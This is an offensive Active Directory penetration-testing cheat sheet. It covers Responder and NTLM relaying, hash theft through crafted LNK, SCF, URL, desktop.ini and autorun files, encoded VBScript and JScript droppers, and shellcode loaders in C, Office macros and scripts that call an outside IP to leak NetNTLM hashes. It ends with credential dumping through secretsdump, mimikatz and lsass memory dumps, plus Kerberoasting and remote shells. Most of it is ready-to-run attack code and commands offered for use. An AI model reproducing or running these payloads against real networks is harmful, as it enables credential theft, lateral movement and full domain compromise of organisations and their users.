Link to this headingResponder

Responder is used to get user Hashes of users on the local network

Edit the Responder.conf file to look like the one below

[Responder Core] ; Servers to start SQL = On SMB = Off # Turn this off Kerberos = On FTP = On POP = On SMTP = On IMAP = On HTTP = Off # Turn this off HTTPS = On DNS = On LDAP = On

Running Responder:

responder -I eth0 -wrfbdFP --lm
Responder.py -bwrd --lm -i IP

Generate IPs in Subnet that don’t have SMB Signing:

cme smb 192.168.1.0/24 --gen-relay-list targets.txt

Link to this headingMultiRelay

Get this tool by installing impacket

Relays authenticated NTLMv1 and NTLMv2 connections using HTTP, WebDav, Proxy and SMB authentications to an SMB server.
When the connections are made to the SMB server they try to spawn a Windows Service with a command shell.

This command shell allows an attacker to use the authentication of the original user to

  • Remotely dump the LM and NT hashes on the target.
  • Remotely dump any registry keys under HKLM.
  • Read any file on the target.
  • Download any file on the target.
  • Execute any command as System on the target.

Triggering on All Users:

./tools/MultiRelay.py -t Target_IP -u ALL

Triggering on specific Users:

./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount AnotherAdmin

Auto Dump SAM on connection:

./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount AnotherAdmin -d

Link to this headingRunFinger

This tool is used to quickly scan an IP range and get information about the Workstations.

Checking if SMBSigning is enabled:

root@lgandx:~/Responder-2.3.3.0# ./tools/RunFinger.py -g -i 10.10.20.0/24 [10.10.20.41: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False'] [10.10.20.36: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False'] [10.10.20.22: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False'] [10.10.20.43: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False'] [10.10.20.49: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'True'] [10.10.20.35: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False'] [10.10.20.40: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False'] ....

Link to this headingNTLMRelay

Relay Hashes and Dump NTHashes

ntlmrelayx.py -tf targets.txt

Relay Hashes and Run Custom Command

ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>

Link to this headingAttacking Newer Systems

Attacking Group Managed Service Accounts

Link to this headingTriggering NTLM relay Requests

NTLM Challenge/Response
Windows Credentials

Link to this headingLFI

The include() in PHP will resolve the network path for us.

http://host.tld/?page=//11.22.33.44/@OsandaMalith

Link to this headingXXE

In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" > ]> <root> <name></name> <tel></tel> <email>OUT&xxe;OUT</email> <password></password> </root>

Link to this headingXPath Injection

Usually, doc() is used in out-of-band XPath injections, thus can be applied in resolving a network path.

http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')

Link to this headingMySQL Injection

I have written a complete post on MySQL out-of-band injections which can be applied over the internet. You can also use ‘INTO OUTFILE’ to resolve a network path.

http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00

Link to this headingMSSQL

Since stacked queries are supported we can call stored procedures.

';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q

Link to this headingRegsvr32

regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll

Link to this headingBatch

There are many possible ways you can explore

echo 1 > //192.168.0.1/abc pushd \\192.168.0.1\abc cmd /k \\192.168.0.1\abc cmd /c \\192.168.0.1\abc start \\192.168.0.1\abc mkdir \\192.168.0.1\abc type\\192.168.0.1\abc dir \\192.168.0.1\abc find \\192.168.0.1\abc findstr copy xcopy move replace del rename

Link to this headingAuto-Complete

You just need to type \\host\ the auto-complete will do the trick under the explorer and the run dialog box.

Link to this headingAutorun.inf

Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.

[autorun] open=\\35.164.153.224\setup.exe icon=something.ico action=open Setup.exe

Link to this headingShell Command Files

You can save this as something.scf and once you open the folder explorer will try to resolve the network path for the icon.

[Shell] Command=2 IconFile=\\35.164.153.224\test.ico [Taskbar] Command=ToggleDesktop

Link to this headingDesktop.ini

The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.

mkdir openMe attrib +s openMe cd openMe echo [.ShellClassInfo] > desktop.ini echo IconResource=\\192.168.0.1\aa >> desktop.ini attrib +s +h desktop.ini

In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.

[.ShellClassInfo] IconFile=\\192.168.0.1\aa IconIndex=1337

Link to this headingShortcut Files (.lnk)

We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.

Set shl = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") currentFolder = shl.CurrentDirectory Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk")) sc.TargetPath = "\\35.164.153.224\@OsandaMalith" sc.WindowStyle = 1 sc.HotKey = "Ctrl+Alt+O" sc.IconLocation = "%windir%\system32\shell32.dll, 3" sc.Description = "I will Steal your Hashes" sc.Save

The Powershell version.

$objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("StealMyHashes.lnk") $lnk.TargetPath = "\\35.164.153.224\@OsandaMalith" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "I will Steal your Hashes" $lnk.HotKey = "Ctrl+Alt+O" $lnk.Save()

Link to this headingInternet Shortcuts (.url)

Another shortcut in Windows is the Internet shortcuts. You can save this as something.url

echo [InternetShortcut] > stealMyHashes.url echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url

Link to this headingAutorun with Registry

You can add a new registry key in any of the following paths.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Link to this headingPowershell

There are probably many scriptlets in Powershell that would resolve a network path.

Invoke-Item \\192.168.0.1\aa Get-Content \\192.168.0.1\aa Start-Process \\192.168.0.1\aa

Link to this headingIE

IE will resolve UNC paths. For example

<img src="\\\\192.168.0.1\\aa">

You can inject under XSS or in scenarios you find SQL injection. For example.

http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00

Link to this headingVBScript

You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.

Set fso = CreateObject("Scripting.FileSystemObject") Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)

You can apply in web pages but this works only with IE.

<html> <script type="text/Vbscript"> <!-- Set fso = CreateObject("Scripting.FileSystemObject") Set file = fso.OpenTextFile("//192.168.0.100/aa", 1) //--> </script> </html>

Here’ the encoded version. You can encode and save this as something.vbe

#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@

You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.

<html> <script type="text/Vbscript.Encode"> <!-- #@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@ //--> </script> </html>

Link to this headingJScript

You can save this as something.js under windows.

var fso = new ActiveXObject("Scripting.FileSystemObject") fso.FileExists("//192.168.0.103/aa")

You can apply the same in html files but only works with IE. Also you can save this as something.hta.

<html> <script type="text/Jscript"> <!-- var fso = new ActiveXObject("Scripting.FileSystemObject") fso.FileExists("//192.168.0.103/aa") //--> </script> </html>

Here’s the encoded version. You can save this as something.jse.

#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@

The html version of this.

<html> <script type="text/Jscript.Encode"> <!-- #@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@ //--> </script> </html>

Link to this headingWindows Script Files

Save this as something.wsf.

<package> <job id="boom"> <script language="VBScript"> Set fso = CreateObject("Scripting.FileSystemObject") Set file = fso.OpenTextFile("//192.168.0.100/aa", 1) </script> </job> </package>

Shellcode

Here’s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.

/* Title: CreateFile Shellcode Author: Osanda Malith Jayathissa (@OsandaMalith) Website: https://osandamalith.com Size: 368 Bytes */ # include <stdlib.h> # include <stdio.h> # include <string.h> # include <windows.h> int main() { char *shellcode = "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02" "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa" "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x29\x01\x05\x05" "\xb9\x02\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x56\xb9\x8d\x10" "\xb7\xf8\xe8\x5f\x05\x05\x05\x68\x31\x01\x05\x05\xff\xd0\xb9\xe0" "\x53\x31\x4b\xe8\x4e\x05\x05\x05\xb9\xac\xd5\xaa\x88\x8b\xf0\xe8" "\x42\x05\x05\x05\x6a\x05\x68\x80\x05\x05\x05\x6a\x03\x6a\x05\x6a" "\x01\x68\x05\x05\x05\x80\x68\x3e\x01\x05\x05\xff\xd0\x6a\x05\xff" "\xd6\x33\xc0\x5e\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe" "\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b" "\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89" "\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40" "\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff" "\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78" "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b" "\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc" "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff" "\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89" "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f" "\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7" "\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf" "\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32" "\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05"; DWORD oldProtect; wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode)); BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect); if (!ret) { fprintf(stderr, "%s", "Error Occured"); return EXIT_FAILURE; } ((void(*)(void))shellcode)(); VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect); return EXIT_SUCCESS; }

Link to this headingShellcode Inside Macros

Here’s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.

' Author : Osanda Malith Jayathissa (@OsandaMalith) ' Title: Shellcode to request a non-existing network path ' Website: https://osandamalith ' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html ' This is a word/excel macro. This can be used in vb6 applications as well #If Vba7 Then Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _ ByVal lpThreadAttributes As Long, _ ByVal dwStackSize As Long, _ ByVal lpStartAddress As LongPtr, _ lpParameter As Long, _ ByVal dwCreationFlags As Long, _ lpThreadId As Long) As LongPtr Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _ ByVal lpAddress As Long, _ ByVal dwSize As Long, _ ByVal flAllocationType As Long, _ ByVal flProtect As Long) As LongPtr Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _ ByVal Destination As LongPtr, _ ByRef Source As Any, _ ByVal Length As Long) As LongPtr #Else Private Declare Function CreateThread Lib "kernel32" ( _ ByVal lpThreadAttributes As Long, _ ByVal dwStackSize As Long, _ ByVal lpStartAddress As Long, _ lpParameter As Long, _ ByVal dwCreationFlags As Long, _ lpThreadId As Long) As Long Private Declare Function VirtualAlloc Lib "kernel32" ( _ ByVal lpAddress As Long, _ ByVal dwSize As Long, _ ByVal flAllocationType As Long, _ ByVal flProtect As Long) As Long Private Declare Function RtlMoveMemory Lib "kernel32" ( _ ByVal Destination As Long, _ ByRef Source As Any, _ ByVal Length As Long) As Long #EndIf Const MEM_COMMIT = &H1000 Const PAGE_EXECUTE_READWRITE = &H40 Sub Auto_Open() Dim source As Long, i As Long #If Vba7 Then Dim lpMemory As LongPtr, lResult As LongPtr #Else Dim lpMemory As Long, lResult As Long #EndIf Dim bShellcode(376) As Byte bShellcode(0) = 232 bShellcode(1) = 255 bShellcode(2) = 255 bShellcode(3) = 255 bShellcode(4) = 255 bShellcode(5) = 192 bShellcode(6) = 95 bShellcode(7) = 185 bShellcode(8) = 85 bShellcode(9) = 3 bShellcode(10) = 2 bShellcode(11) = 2 bShellcode(12) = 129 bShellcode(13) = 241 bShellcode(14) = 2 bShellcode(15) = 2 bShellcode(16) = 2 ..................... lpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) For i = LBound(bShellcode) To UBound(bShellcode) source = bShellcode(i) lResult = RtlMoveMemory(lpMemory + i, source, 1) Next i lResult = CreateThread(0, 0, lpMemory, 0, 0, 0) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub

Link to this headingShellcode Inside VBS and JS

subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.
DEAD LINK Replace with archive.org
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.
Note the following shellcode directs to my IP.

JScript:

/* * Author : Osanda Malith Jayathissa (@OsandaMalith) * Title: Shellcode to request a non-existing network path * Website: https://osandamalith.com * Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html * Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04 */ DX = new ActiveXObject("DynamicWrapperX"); DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"); DX.Register("kernel32.dll","CreateThread","i=uullu","r=u" ); DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"); var MEM_COMMIT = 0x1000; var PAGE_EXECUTE_READWRITE = 0x40; var sc = [ 0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7, 0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e, 0x8b, 0xfe, 0x81, 0xc6, 0x29, 0x01, 0x05, 0x05, 0xb9, 0x02, 0x05, 0x05, 0x05, 0xfc, 0xad, 0x01, 0x3c, 0x07, 0xe2, 0xfa, 0x56, 0xb9, 0x8d, 0x10, 0xb7, 0xf8, 0xe8, 0x5f, 0x05, 0x05, 0x05, 0x68, 0x31, 0x01, 0x05, 0x05, 0xff, 0xd0, 0xb9, 0xe0, 0x53, 0x31, 0x4b, 0xe8, 0x4e, 0x05, 0x05, 0x05, 0xb9, 0xac, 0xd5, 0xaa, 0x88, 0x8b, 0xf0, 0xe8, 0x42, 0x05, 0x05, 0x05, 0x6a, 0x05, 0x68, 0x80, 0x05, 0x05, 0x05, 0x6a, 0x03, 0x6a, 0x05, 0x6a, 0x01, 0x68, 0x05, 0x05, 0x05, 0x80, 0x68, 0x3e, 0x01, 0x05, 0x05, 0xff, 0xd0, 0x6a, 0x05, 0xff, 0xd6, 0x33, 0xc0, 0x5e, 0xc3, 0x33, 0xd2, 0xeb, 0x10, 0xc1, 0xca, 0x0d, 0x3c, 0x61, 0x0f, 0xbe, 0xc0, 0x7c, 0x03, 0x83, 0xe8, 0x20, 0x03, 0xd0, 0x41, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xea, 0x8b, 0xc2, 0xc3, 0x8d, 0x41, 0xf8, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x14, 0x53, 0x56, 0x57, 0x89, 0x4d, 0xf4, 0x64, 0xa1, 0x30, 0x05, 0x05, 0x05, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x0c, 0x8b, 0x40, 0x14, 0x89, 0x45, 0xec, 0x8b, 0xf8, 0x8b, 0xcf, 0xe8, 0xd2, 0xff, 0xff, 0xff, 0x8b, 0x70, 0x18, 0x8b, 0x3f, 0x85, 0xf6, 0x74, 0x4f, 0x8b, 0x46, 0x3c, 0x8b, 0x5c, 0x30, 0x78, 0x85, 0xdb, 0x74, 0x44, 0x8b, 0x4c, 0x33, 0x0c, 0x03, 0xce, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x8b, 0x4c, 0x33, 0x20, 0x89, 0x45, 0xf8, 0x33, 0xc0, 0x03, 0xce, 0x89, 0x4d, 0xf0, 0x89, 0x45, 0xfc, 0x39, 0x44, 0x33, 0x18, 0x76, 0x22, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0xe8, 0x75, 0xff, 0xff, 0xff, 0x03, 0x45, 0xf8, 0x39, 0x45, 0xf4, 0x74, 0x1c, 0x8b, 0x45, 0xfc, 0x8b, 0x4d, 0xf0, 0x40, 0x89, 0x45, 0xfc, 0x3b, 0x44, 0x33, 0x18, 0x72, 0xde, 0x3b, 0x7d, 0xec, 0x75, 0x9c, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x4d, 0xfc, 0x8b, 0x44, 0x33, 0x24, 0x8d, 0x04, 0x48, 0x0f, 0xb7, 0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05, 0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33, 0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05]; var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); for(var i = 0; i < sc.length; i++) DX.NumPut(sc[i],scLocation,i); var thread = DX.CreateThread(0,0,scLocation,0,0); //https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js

VBScript

' Author : Osanda Malith Jayathissa (@OsandaMalith) ' Title: Shellcode to request a non-existing network path ' Website: https://osandamalith.com ' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html ' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04 Set DX = CreateObject("DynamicWrapperX") DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u" DX.Register "kernel32.dll","CreateThread","i=uullu","r=u" DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u" Const MEM_COMMIT = &H1000 Const PAGE_EXECUTE_READWRITE = &H40 shellcode = Array( _ &He8, &Hff, &Hff, &Hff, &Hff, &Hc0, &H5f, &Hb9, &H55, &H03, &H02, &H02, &H81, &Hf1, &H02, &H02, &H02, &H02, &H83, &Hc7, _ &H1d, &H33, &Hf6, &Hfc, &H8a, &H07, &H3c, &H05, &H0f, &H44, &Hc6, &Haa, &He2, &Hf6, &He8, &H05, &H05, &H05, &H05, &H5e, _ &H8b, &Hfe, &H81, &Hc6, &H29, &H01, &H05, &H05, &Hb9, &H02, &H05, &H05, &H05, &Hfc, &Had, &H01, &H3c, &H07, &He2, &Hfa, _ &H56, &Hb9, &H8d, &H10, &Hb7, &Hf8, &He8, &H5f, &H05, &H05, &H05, &H68, &H31, &H01, &H05, &H05, &Hff, &Hd0, &Hb9, &He0, _ &H53, &H31, &H4b, &He8, &H4e, &H05, &H05, &H05, &Hb9, &Hac, &Hd5, &Haa, &H88, &H8b, &Hf0, &He8, &H42, &H05, &H05, &H05, _ &H6a, &H05, &H68, &H80, &H05, &H05, &H05, &H6a, &H03, &H6a, &H05, &H6a, &H01, &H68, &H05, &H05, &H05, &H80, &H68, &H3e, _ &H01, &H05, &H05, &Hff, &Hd0, &H6a, &H05, &Hff, &Hd6, &H33, &Hc0, &H5e, &Hc3, &H33, &Hd2, &Heb, &H10, &Hc1, &Hca, &H0d, _ &H3c, &H61, &H0f, &Hbe, &Hc0, &H7c, &H03, &H83, &He8, &H20, &H03, &Hd0, &H41, &H8a, &H01, &H84, &Hc0, &H75, &Hea, &H8b, _ &Hc2, &Hc3, &H8d, &H41, &Hf8, &Hc3, &H55, &H8b, &Hec, &H83, &Hec, &H14, &H53, &H56, &H57, &H89, &H4d, &Hf4, &H64, &Ha1, _ &H30, &H05, &H05, &H05, &H89, &H45, &Hfc, &H8b, &H45, &Hfc, &H8b, &H40, &H0c, &H8b, &H40, &H14, &H89, &H45, &Hec, &H8b, _ &Hf8, &H8b, &Hcf, &He8, &Hd2, &Hff, &Hff, &Hff, &H8b, &H70, &H18, &H8b, &H3f, &H85, &Hf6, &H74, &H4f, &H8b, &H46, &H3c, _ &H8b, &H5c, &H30, &H78, &H85, &Hdb, &H74, &H44, &H8b, &H4c, &H33, &H0c, &H03, &Hce, &He8, &H96, &Hff, &Hff, &Hff, &H8b, _ &H4c, &H33, &H20, &H89, &H45, &Hf8, &H33, &Hc0, &H03, &Hce, &H89, &H4d, &Hf0, &H89, &H45, &Hfc, &H39, &H44, &H33, &H18, _ &H76, &H22, &H8b, &H0c, &H81, &H03, &Hce, &He8, &H75, &Hff, &Hff, &Hff, &H03, &H45, &Hf8, &H39, &H45, &Hf4, &H74, &H1c, _ &H8b, &H45, &Hfc, &H8b, &H4d, &Hf0, &H40, &H89, &H45, &Hfc, &H3b, &H44, &H33, &H18, &H72, &Hde, &H3b, &H7d, &Hec, &H75, _ &H9c, &H33, &Hc0, &H5f, &H5e, &H5b, &Hc9, &Hc3, &H8b, &H4d, &Hfc, &H8b, &H44, &H33, &H24, &H8d, &H04, &H48, &H0f, &Hb7, _ &H0c, &H30, &H8b, &H44, &H33, &H1c, &H8d, &H04, &H88, &H8b, &H04, &H30, &H03, &Hc6, &Heb, &Hdf, &H21, &H05, &H05, &H05, _ &H50, &H05, &H05, &H05, &H6b, &H65, &H72, &H6e, &H65, &H6c, &H33, &H32, &H2e, &H64, &H6c, &H6c, &H05, &H2f, &H2f, &H33, _ &H35, &H2e, &H31, &H36, &H34, &H2e, &H31, &H35, &H33, &H2e, &H32, &H32, &H34, &H2f, &H61, &H61, &H05) scLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) For i =LBound(shellcode) to UBound(shellcode) DX.NumPut shellcode(i),scLocation,i Next thread = DX.CreateThread (0,0,scLocation,0,0)

Link to this headingAfter Getting an account

Upload Files to the target system:

>>> smbclient.py winlab.com/[email protected] Password: Type help for list of commands # use c$ # put /opt/procdump/procdump64.exe # exit

Test that credentials are valid:

>>> cme smb 192.168.0.253 -u user1 -p password -d CORP

Test that local hashes are valid:

>>> cme smb 10.2.16.66 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:d405284cd5e3ff57dd16f530a36e9e1e --local-auth

Get a Remote Command Shell:

>>> impacket-wmiexec "CORP/user1:password"@10.100.43.204 C:\>whoami CORP\user1

Link to this headingFinding the Domain Controller

Find the IP address of the Domain Controller:

C:\>nslookup asdf *** il-ad-wp4.CORP.local can't find asdf: Non-existent domain Server: il-ad-wp4.CORP.local Address: 10.2.16.66

Link to this headingBloodHound

Faster Injestor C#
Faster Injestor Powershell

Identify domain admins:

net group "Domain Admins" /domain net group "Enterprise Admins" /domain

Stealthy Identify domain admins:
Situational Awareness Host Enumeration

Marking Users that we control:

from neo4j.v1 import GraphDatabase import sys driver = None def init_driver(database, user, password): global driver uri = "bolt://%s:7687" % database driver = GraphDatabase.driver(uri, auth=(user, password)) return driver def close_driver(): global driver driver.close() init_driver('localhost', 'neo4j', 'BloodHound') with open(sys.argv[1]) as infile: q = "MATCH (n:User {name: {name}}) SET n.owned = true" with driver.session() as session: for line in infile: user = '%s@%s' % (line.strip().upper(), sys.argv[2].upper()) fromres = session.run(q, name=user)

Link to this headingBloodHound.py

Python Version of BloodHound for Linux

Use BloodHound to get all of the computers, users and their connections:

>>> ./bloodhound.py -u user1 -p password -d CORP.local -dc 10.2.16.66 >>> zip a.zip *.json

Import the json files into the neo4j database.

Try to see if there is a way to get directly to domain admin from the compromised accounts. By using the road maps.

Link to this headingDumping Creds

When you have a user that is local admin on a box you can use it to dump hashes of other users on the box.

Impact-SecretsDump:

root@kali:~# impacket-secretsdump "CORP/user1:password"@10.100.43.204 Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: [REMOVED]] [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:11111111111114eeaad3b435b51404ee:1111111111113ff57dd16f530a36e9e1e::: Guest:501:11111111111114eeaad3b435b51404ee:1111111111111131b73c59d7e0c089c0::: hudson:1003:11111111111114eeaad3b435b51404ee:1111111111111111e27cbfbabaf2f8860::: [*] Dumping cached domain logon information (domain/username:hash) CORP.LOCAL/admin1:$DCC2$10240#admin1#111111196b6ceb7653cb3e406a18b5e6 CORP.LOCAL/admin2:$DCC2$10240#admin2#1111111a5186277aadbcba3b59d37a3c CORP.LOCAL/user1:$DCC2$10240#user1#1111111111d924879545f330427243cae CORP.LOCAL/admin3:$DCC2$10240#admin3#111111119b768776c8caf9955d3d1331 [*] Dumping LSA Secrets [*] $MACHINE.ACC CORP\WIN2012R2MYSQL$:aes256-cts-hmac-sha1-96:111111111111111111192903d328e87a5881d5d1abf5d92876ee70a41f8fa0d3 CORP\WIN2012R2MYSQL$:aes128-cts-hmac-sha1-96:11111111111119c314717c02e1d041b9 CORP\WIN2012R2MYSQL$:des-cbc-md5:11111111dfdb5a4 CORP\WIN2012R2MYSQL$:11111111111114eeaad3b435b51404ee:1111111111118a98b72ddb658f79ecae6::: [*] DPAPI_SYSTEM dpapi_machinekey:0xfc83ab3e1d7dc9ed983fc31111111111111111111 dpapi_userkey:0x8b8de7e43fe9a47e6792f28e111111111111111111 [*] NL$KM [...] NL$KM:111111111111111111111111d92fcd57caff9865489642531c900a3d149ecd2d5f7b674a561412999b1379badfe1418eccd860bcb2c5aa644a902cc8db1685c4 [*] Cleaning up... [*] Stopping service RemoteRegistry

Link to this headingKerberosting

When you have credentials for a user on the Domain you can make a request to the Domain Controller to get Weakly encrypted credentials for all users.

root@kali:~# impacket-GetUserSPNs -request -dc-ip 10.2.16.66 CORP.local/user1 Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation Password: [...]

Link to this headingHow to Fix Kerberosting

Kerberoasting Revisited

Link to this headingInveigh

For Windows to get Windows password Hashes

Inveigh

Link to this headingmimikatz

mimikatz
procdump
autoproc

Dump LSA Secrets:

mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords Invoke-Mimikatz -Command "token::elevate lsadump::secrets"

Dump Memory of LSA Service for offline mimikatz:

#Dump Lsass memory on target system procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 procdump64.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 #load lass.dmp and extract secrets mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit

Auto Memory of LSA Service for offline mimikatz:

#Auto dump processes with autoproc.py python3 autoProc.py domain/user@target

Link to this headingbypass AV dump creds

